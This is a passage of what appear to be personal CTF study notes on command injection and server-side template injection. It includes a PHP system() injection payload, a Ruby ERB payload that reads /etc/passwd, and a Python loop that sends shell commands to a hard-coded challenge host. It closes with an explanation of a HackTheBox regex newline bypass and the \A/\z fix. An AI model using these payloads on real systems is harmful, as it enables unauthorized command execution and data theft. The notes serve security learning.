-
Notifications
You must be signed in to change notification settings - Fork 0
/
Command injection
50 lines (38 loc) · 2.07 KB
/
Command injection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
Try what you see in 'hacktricks' and 'payloadallthethings'
If nothing works:
${system($_GET[cmd])}&cmd=+ls >> seems creating a php variable
In the case above, I don't remember if it was a SSTI case.
In the case below, this code is a SSTI in ruby:
<%= system('cat /etc/passwd') %> >> website that uses ruby. <%= %> is to create a ruby variable.
I need to study about this things: php injection and ruby injection creating variables.
-----------------------------------------------------------------------------
python script:
import requests, urllib.parse, readline, re
URL = "http://167.71.142.156:32015"
while True:
pwd = input("$ ")
readline.get_completer()
pwd = urllib.parse.quote_plus(pwd)
r = requests.get(URL+"/?format=${system($_GET[cmd])}&cmd="+pwd)
text = r.text
text = re.sub(r'<html>.*', '', text, flags=re.DOTALL)
print(text)
-----------------------------------------------------------------------------
Maybe it is interesting to try add newline urlencoded!
Something interesting that I saw in htb Neonify challenge:
The back end code was this one:
post '/' do
if params[:neon] =~ /^[0-9a-z ]+$/i
@neon = ERB.new(params[:neon]).result(binding)
else
@neon = "Malicious Input Detected"
end
erb :'index'
end
So, the answer to exploit was escaping the regex sentence with a newline. Why? The explanation:
^ Matches the beginning of a line.
$ Matches the end of a line.
\A Matches the beginning of the string.
\z Matches the end of the string.
\Z Matches the end of the string unless the string ends with a "\n", in which case it matches just before the "\n".
So, use \A and lowercase \z. If you use \Z someone could sneak in a newline character. This is not dangerous I think, but might screw up algorithms that assume that there's no whitespace in the string. Depending on your regex and string-length constraints someone could use an invisible name with just a newline character.